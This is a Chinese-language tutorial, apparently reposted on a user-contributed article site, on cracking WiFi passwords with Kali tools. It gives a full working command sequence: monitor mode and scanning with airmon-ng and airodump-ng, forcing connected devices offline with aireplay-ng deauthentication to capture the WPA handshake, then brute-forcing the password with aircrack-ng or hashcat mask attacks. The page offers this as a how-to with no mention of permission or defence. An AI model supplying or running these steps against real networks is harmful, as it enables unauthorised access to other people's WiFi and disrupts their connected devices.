admin管理员组文章数量:1606853
第一步 将网卡处于监听状态
airmon-ng check
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0
第二步 扫描可用wifi
airodump-ng wlan0mon
第三部 获取wifi的握手包
airodump-ng -c (上一步扫描的CH) --bssid (想要破解wifi的ssid) -w (握手文件存放目录) wlan0mon
注意:得到wifi的握手包需要有设备连接在该wifi下,原理是将该连接的设备提下线,该设备会重新连接,我们就可以获得该设备连接wifi时所发送的握手包。
将该wifi下的设备强制踢下去
aireplay-ng -0 0 -a (要破解的wifi的ssid) -c (强制踢下的设备的ssid) wlan0mon
当右上角出现WPA handshake ****的时候说明获取成功
第四部 破解密码
- 使用aircrack-ng 破解,该方法需要字典,效率低并且成功率不高
aircrack-ng -a2 -b (破解wifi的ssid) -w (字典文件) *.cap(以cap后缀文件握手包)
- 使用hashcat来破解,可以使用字典也可以不使用字典(这里只讲不适用字典的情况)
1 将握手包转换成hccap格式
aircrack-ng *.cap -J wpahashcat
2 进行破解
hashcat -m 2500 -a 3 wpahash.hccap ?d?d?d?d
-m 2500:代表破解WPA/WPA2
-a 3:使用掩码暴力破解
wpahash.hccap: 为上一步转换的hccap文件,若是提示“Old hccap format detected! You need to update”可以将第一步的命令改为
aircrack-ng *.cap -j wpahashcat //生成wpahashcat.hccapx文件
后面的字符:
但如果我们不确定某一位到底是数字还是字母怎么写组合呢?这时候就要用到高级组合:
比如设置 --custom-charset1=?l?d 那么就表示 ?1代表小写字母与数字组合,那么8位随机的数字与小写字母组合可以写成 ?1?1?1?1?1?1?1?1,完整的例子:
hashcat test.txt -a 3 -m 0 --custom-charset1=?l?d
?1?1?1?1?1?1?1?1
再比如设置 --custom-charset2=xiao106347 那么就表示 ?2 代表字符串由 x i a o 1 0 6 3 4 7 组成的所有可能组合,完整例子:
hashcat test.txt -a 3 -m 0 --custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2
注意:1、如果提示“not a native intel openCL runtime“可以直接在后面加上 --force强制运行
2、如果是使用虚拟机运行可能会出现“Device #1: This device's constant buffer size is too small.
Device #1: This device's local mem size is too small”此时将虚拟机的处理器改为单核处理器
版权声明:本文标题:hashcat破解wifi密码(kali) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1728515426a1161766.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论